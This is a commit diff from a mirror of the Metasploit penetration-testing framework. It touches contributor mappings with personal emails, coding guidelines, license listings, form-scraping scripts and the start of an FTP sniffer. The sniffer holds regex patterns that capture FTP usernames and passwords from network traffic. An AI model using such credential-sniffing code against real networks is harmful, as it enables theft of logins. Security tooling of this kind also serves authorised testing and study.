infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into getaddrinfo

bug/bundler_fix
Meatballs 2013-11-24 15:00:00 +00:00
parent f9359c9d88 13ad48fd78
commit 23ac7ad75a
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
2987 changed files with 57816 additions and 46315 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
.gitignore vendored
View File

@ -41,3 +41,13 @@ tags
*~ *~
# Ignore backups of retabbed files # Ignore backups of retabbed files
*.notab *.notab
# ignore Visual Studio external source garbage
*.suo
*.sdf
*.opensdf
*.user
# ignore release/debug folders for exploits
external/source/exploits/**/Debug
external/source/exploits/**/Release

39
.mailmap
View File

@ -1,50 +1,54 @@
bperry-r7 <bperry-r7@github> Brandon Perry <bperry.volatile@gmail.com>
bperry-r7 <bperry-r7@github> Brandon Perry <bperry@bperry-rapid7.(none)>
bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com> bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com> dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com> ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com> hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net> hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com> joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com> jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com> limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com> shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com> tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com> todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com> todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com> wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
# Above this line are current Rapid7 employees Below this paragraph are # Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at # volunteers, former employees, and potential Rapid7 employees who, at
# one time or another, had some largeish number of commits landed on # one time or another, had some largeish number of commits landed on
# rapid7/metasploit-framework master branch. This should be refreshed # rapid7/metasploit-framework master branch. This should be refreshed
# periodically. If you're on this list and would like to not be, just # periodically. If you're on this list and would like to not be, just
# let todb@metasploit.com know. # let todb@metasploit.com know.
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
Brandon Perry <brandonprry@github> Brandon Perry <bperry.volatile@gmail.com>
Brandon Perry <brandonprry@github> Brandon Perry <bperry@bperry-rapid7.(none)>
Brian Wallace <bwall@github> (B)rian (Wall)ace <nightstrike9809@gmail.com> Brian Wallace <bwall@github> (B)rian (Wall)ace <nightstrike9809@gmail.com>
Brian Wallace <bwall@github> Brian Wallace <bwall@openbwall.com> Brian Wallace <bwall@github> Brian Wallace <bwall@openbwall.com>
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
Chao-mu <Chao-Mu@github> Chao Mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc> ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc> ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com>
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be> corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com> darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com> efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <> efraintorres <efraintorres@github> et <>
fab <fab@???> fab <> # fab at revhosts.net (Fabrice MOURRON) fab <fab@???> fab <> # fab at revhosts.net (Fabrice MOURRON)
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com> FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com>
h0ng10 <h0ng10@github> h0ng10 <hansmartin.muench@googlemail.com> h0ng10 <h0ng10@github> h0ng10 <hansmartin.muench@googlemail.com>
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com>
jcran <jcran@github> Jonathan Cran <jcran@0x0e.org> jcran <jcran@github> Jonathan Cran <jcran@0x0e.org>
jcran <jcran@github> Jonathan Cran <jcran@rapid7.com> jcran <jcran@github> Jonathan Cran <jcran@rapid7.com>
jduck <jduck@github> Joshua Drake <github.jdrake@qoop.org> jduck <jduck@github> Joshua Drake <github.jdrake@qoop.org>
@ -56,11 +60,16 @@ kris <kris@???> kris <>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <github@s3cur1ty.de> m-1-k-3 <m-1-k-3@github> m-1-k-3 <github@s3cur1ty.de>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <m1k3@s3cur1ty.de> m-1-k-3 <m-1-k-3@github> m-1-k-3 <m1k3@s3cur1ty.de>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <michael.messner@integralis.com> m-1-k-3 <m-1-k-3@github> m-1-k-3 <michael.messner@integralis.com>
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com> mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net> nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk> nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com> nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>
ohdae <ohdae@github> ohdae <bindshell@live.com> ohdae <ohdae@github> ohdae <bindshell@live.com>
OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local> r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com> r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane

2
.rspec
View File

@ -1,2 +1,2 @@
--color --color
--format documentation --format Fivemat

2
Gemfile
View File

@ -40,6 +40,8 @@ group :development, :test do
# Version 4.1.0 or newer is needed to support generate calls without the # Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax. # 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0' gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks # running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0' gem 'rake', '>= 10.0.0'
end end

2
Gemfile.lock
View File

@ -18,6 +18,7 @@ GEM
diff-lcs (1.2.4) diff-lcs (1.2.4)
factory_girl (4.2.0) factory_girl (4.2.0)
activesupport (>= 3.0.0) activesupport (>= 3.0.0)
fivemat (1.2.1)
i18n (0.6.5) i18n (0.6.5)
json (1.8.0) json (1.8.0)
metasploit_data_models (0.16.6) metasploit_data_models (0.16.6)
@ -62,6 +63,7 @@ DEPENDENCIES
activesupport (>= 3.0.0) activesupport (>= 3.0.0)
database_cleaner database_cleaner
factory_girl (>= 4.1.0) factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json json
metasploit_data_models (~> 0.16.6) metasploit_data_models (~> 0.16.6)
msgpack msgpack

49
HACKING
View File

@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an need user input, you can either register an option or expose an
interactive session type specific for the type of exploit. interactive session type specific for the type of exploit.
3. Don't use "sleep". It has been known to cause issues with 3. Always use Rex sockets, not ruby sockets. This includes
multi-threaded programs on various platforms running an older version of
Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
Rex.sleep() throughout the framework. We have found this works around
the underlying issue.
4. Always use Rex sockets, not ruby sockets. This includes
third-party libraries such as Net::Http. There are several very good third-party libraries such as Net::Http. There are several very good
reasons for this rule. First, the framework doesn't get notified on reasons for this rule. First, the framework doesn't get notified on
the creation of ruby sockets and won't know how to clean them up in the creation of ruby sockets and won't know how to clean them up in
@ -54,49 +48,46 @@ already implemented with Rex and if the protocol you need is missing,
porting another library to use them is straight-forward. See our porting another library to use them is straight-forward. See our
Net::SSH modifications in lib/net/ssh/ for an example. Net::SSH modifications in lib/net/ssh/ for an example.
5. When opening an IO stream, always force binary with "b" mode (or 4. When opening an IO stream, always force binary with "b" mode (or
using IO#binmode). This not only helps keep Windows and non-Windows using IO#binmode). This not only helps keep Windows and non-Windows
runtime environments consistent with each other, but also guarantees runtime environments consistent with each other, but also guarantees
that files will be treated as ASCII-8BIT instead of UTF-8. that files will be treated as ASCII-8BIT instead of UTF-8.
6. Don't use String#[] for a single character. This returns a Fixnum in 5. Don't use String#[] for a single character. This returns a Fixnum in
ruby 1.8 and a String in 1.9, so it's safer to use the following idiom: ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
str[idx,1] str[idx,1]
which always returns a String. If you need the ASCII byte, unpack it like which always returns a String. If you need the ASCII byte, unpack it like
so: so:
str[idx,1].unpack("C")[0] tr[idx,1].unpack("C")[0]
7. Whenever possible, avoid using '+' or '+=' to concatenate strings. 6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
The '<<' operator is significantly faster. The difference will become The '<<' operator is significantly faster. The difference will become
even more apparent when doing string manipulation in a loop. The even more apparent when doing string manipulation in a loop. The
following table approximates the underlying implementation: following table approximates the underlying implementation:
Ruby Pseudo-C
----------- ---------------- Ruby Pseudo-C
a = b + c a = malloc(b.len+c.len+1); ----------- ----------------
strcpy(a, b); a = b + c a = malloc(b.len+c.len+1);
memcpy(a+b.len, c, c.len); strcpy(a, b);
a[b.len + c.len] = '\0'; memcpy(a+b.len, c, c.len);
a = b a = b; a[b.len + c.len] = '\0';
a << c a = realloc(a, a.len+c.len+1); a = b a = b;
memcpy(a+a.len, c, c.len); a << c a = realloc(a, a.len+c.len+1);
a[a.len + c.len] = '\0'; memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Note that the original value of 'b' is lost in the second case. Care Note that the original value of 'b' is lost in the second case. Care
must be taken to duplicate strings that you do not want to modify. must be taken to duplicate strings that you do not want to modify.
8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's 7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
excellent slide show at <http://slideshow.rubyforge.org/ruby19.html> excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
for an overview of common and not-so-common Ruby version related gotchas. for an overview of common and not-so-common Ruby version related gotchas.
9. Never, ever use $global variables. This applies to modules, mixins, 8. Never, ever use $global variables. This applies to modules, mixins,
and libraries. If you need a "global" within a specific class, you can and libraries. If you need a "global" within a specific class, you can
use @@class_variables, but most modules should use @instance variables use @@class_variables, but most modules should use @instance variables
to store information between methods. to store information between methods.
10. Do not define CONSTANTS within individual modules. This can lead to
warning messages when the module is reloaded. Try to keep constants
inside libraries and mixins instead.
Creating New Modules Creating New Modules
==================== ====================

347
LICENSE
View File

@ -12,7 +12,7 @@ License: BSD-3-clause
# #
# This license does not apply to third-party components detailed below. # This license does not apply to third-party components detailed below.
# #
# Last updated: 2013-Mar-25 # Last updated: 2013-Nov-04
# #
Files: data/john/* Files: data/john/*
@ -166,230 +166,6 @@ Files: lib/fastlib.rb
Copyright: 2011, Rapid7 Inc. Copyright: 2011, Rapid7 Inc.
License: Ruby License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
Copyright: 2006-2007, Francis Cianfrocca
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
Copyright: Austin Ziegler
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
Copyright: 1997-2012 by the authors
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
Copyright: Marc-Andre Cournoyer
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
Copyright: 2007-2012, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
Copyright: 2006-2010, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
License: LGPL-2.1
Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
Copyright: 2006-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
Copyright: 2007 David Heinemeir Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
Copyright: 2011 Ben Johnson of Binary Logic
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
Copyright: 2008-2012 Jonas Nicklas
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
Copyright: 2010 Willem van Bergen
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: Rob Aldred
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
Copyright: 2005-2012 Thomas Uehlinger
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
Copyright: 2006-2011 kuwata-lab.com all rights reserved
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
Copyright: 2008-2010
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
Copyright: 2011 Travis Tilley
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
Copyright: 2011 Sam Stephenson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
Copyright: 2008 The Ruby I18n team
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
Copyright: 2010-2012 John Crepezzi
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
Copyright: 2011 Aaron Patternson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
Copyright: 2010 Andre Arko
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
Copyright: 2005, 2006 Tobias Luetke
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
Copyright: 2011 John Mair (banisterfiend)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
Copyright: 2007 Clifford Heath
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
Copyright: 2010 Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
Copyright: No copyright statement provided
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
Copyright: 2012 Lee Jarvis
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
Copyright: 2009 Tim Harper
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
Copyright: 2011 Sam Stephenson, Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
Copyright: 2006-2012 Aaron Pfeifer
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
Copyright: 2008 Yehuda Katz
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
Copyright: 2007 Nathan Sobo
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
Copyright: 2005-2006 Philip Ross
License: MIT
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/* Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
Copyright: 2006-2010 Yoann GUILLOT Copyright: 2006-2010 Yoann GUILLOT
License: LGPL-2.1 License: LGPL-2.1
@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com> Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
License: BSD-3-clause License: BSD-3-clause
#
# Gems
#
Files: activemodel
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activerecord
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activesupport
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: arel
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: builder
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: database_cleaner
Copyright: 2009 Ben Mabey
License: MIT
Files: diff-lcs
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: factory_girl
Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
License: MIT
Files: fivemat
Copyright: 2012 Tim Pope
License: MIT
Files: i18n
Copyright: 2008 The Ruby I18n team
License: MIT
Files: json
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: metasploit_data_models
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: mini_portile
Copyright: 2011 Luis Lavena
License: MIT
Files: msgpack
Copyright: Austin Ziegler
License: Ruby
Files: multi_json
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: network_interface
Copyright: 2012, Rapid7, Inc.
License: MIT
Files: nokogiri
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: packetfu
Copyright: 2008-2012 Tod Beardsley
License: BSD-3-clause
Files: pcaprub
Copyright: 2007-2008, Alastair Houghton
License: LGPL-2.1
Files: pg
Copyright: 1997-2012 by the authors
License: Ruby
Files: rake
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: redcarpet
Copyright: 2009 Natacha Porté
License: MIT
Files: robots
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: rspec
Copyright: 2009 Chad Humphries, David Chelimsky
License: MIT
Files: shoulda-matchers
Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
License: MIT
Files: simplecov
Copyright: 2010-2012 Christoph Olszowka
License: MIT
Files: timecop
Copyright: 2012 Travis Jeffery, John Trupiano
License: MIT
Files: tzinfo
Copyright: 2005-2006 Philip Ross
License: MIT
Files: yard
Copyright: 2007-2013 Loren Segal
License: MIT
License: BSD-2-clause License: BSD-2-clause
Redistribution and use in source and binary forms, with or without modification, Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: are permitted provided that the following conditions are met:

BIN
data/exploits/CVE-2010-0232/kitrap0d.x86.dll Executable file
View File

Binary file not shown.

46
data/exploits/capture/http/forms/extractforms.rb
View File

@ -15,8 +15,8 @@ require 'open-uri'
require 'timeout' require 'timeout'
def usage def usage
$stderr.puts "#{$0} [site list] [output-dir]" $stderr.puts "#{$0} [site list] [output-dir]"
exit(0) exit(0)
end end
input = ARGV.shift() || usage() input = ARGV.shift() || usage()
@ -25,32 +25,32 @@ res = ""
doc = Hpricot(File.open(input)) doc = Hpricot(File.open(input))
doc.search("//form").each do |form| doc.search("//form").each do |form|
# Extract the form # Extract the form
res = "<form" res = "<form"
form.attributes.each do |attr| form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'" res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end end
res << "> " res << "> "
# Strip out the value # Strip out the value
form.search("//input") do |inp| form.search("//input") do |inp|
inp.attributes.keys.each do |ikey| inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value") if (ikey.downcase == "value")
inp[ikey] = "" inp[ikey] = ""
next next
end end
if(inp.attributes[ikey] =~ /^http/i) if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = "" inp[ikey] = ""
next next
end end
end end
res << inp.to_html res << inp.to_html
end end
res << "</form>" res << "</form>"
end end
$stdout.puts res $stdout.puts res

96
data/exploits/capture/http/forms/grabforms.rb
View File

@ -15,72 +15,72 @@ require 'open-uri'
require 'timeout' require 'timeout'
def usage def usage
$stderr.puts "#{$0} [site list] [output-dir]" $stderr.puts "#{$0} [site list] [output-dir]"
exit(0) exit(0)
end end
sitelist = ARGV.shift() || usage() sitelist = ARGV.shift() || usage()
output = ARGV.shift() || usage() output = ARGV.shift() || usage()
File.readlines(sitelist).each do |site| File.readlines(sitelist).each do |site|
site.strip! site.strip!
next if site.length == 0 next if site.length == 0
next if site =~ /^#/ next if site =~ /^#/
out = File.join(output, site + ".txt") out = File.join(output, site + ".txt")
File.unlink(out) if File.exists?(out) File.unlink(out) if File.exists?(out)
fd = File.open(out, "a") fd = File.open(out, "a")
["", "www."].each do |prefix| ["", "www."].each do |prefix|
begin begin
Timeout.timeout(10) do Timeout.timeout(10) do
doc = Hpricot(open("http://#{prefix}#{site}/")) doc = Hpricot(open("http://#{prefix}#{site}/"))
doc.search("//form").each do |form| doc.search("//form").each do |form|
# Extract the form # Extract the form
res = "<form" res = "<form"
form.attributes.each do |attr| form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'" res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end end
res << "> " res << "> "
# Strip out the value # Strip out the value
form.search("//input") do |inp| form.search("//input") do |inp|
inp.attributes.keys.each do |ikey| inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value") if (ikey.downcase == "value")
inp[ikey] = "" inp[ikey] = ""
next next
end end
if(inp.attributes[ikey] =~ /^http/i) if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = "" inp[ikey] = ""
next next
end end
end end
res << inp.to_html res << inp.to_html
end end
res << "</form>" res << "</form>"
fd.write(res) fd.write(res)
end end
end end
break break
rescue ::Timeout::Error rescue ::Timeout::Error
$stderr.puts "#{prefix}#{site} timed out" $stderr.puts "#{prefix}#{site} timed out"
rescue ::Interrupt rescue ::Interrupt
raise $! raise $!
rescue ::Exception => e rescue ::Exception => e
$stderr.puts "#{prefix}#{site} #{e.class} #{e}" $stderr.puts "#{prefix}#{site} #{e.class} #{e}"
end end
end end
fd.close fd.close
File.unlink(out) if (File.size(out) == 0) File.unlink(out) if (File.size(out) == 0)
end end

110
data/exploits/psnuffle/ftp.rb
View File

@ -8,71 +8,71 @@
class SnifferFTP < BaseProtocolParser class SnifferFTP < BaseProtocolParser
def register_sigs def register_sigs
self.sigs = { self.sigs = {
:banner => /^(220\s*[^\r\n]+)/i, :banner => /^(220\s*[^\r\n]+)/i,
:user => /^USER\s+([^\s]+)/i, :user => /^USER\s+([^\s]+)/i,
:pass => /^PASS\s+([^\s]+)/i, :pass => /^PASS\s+([^\s]+)/i,
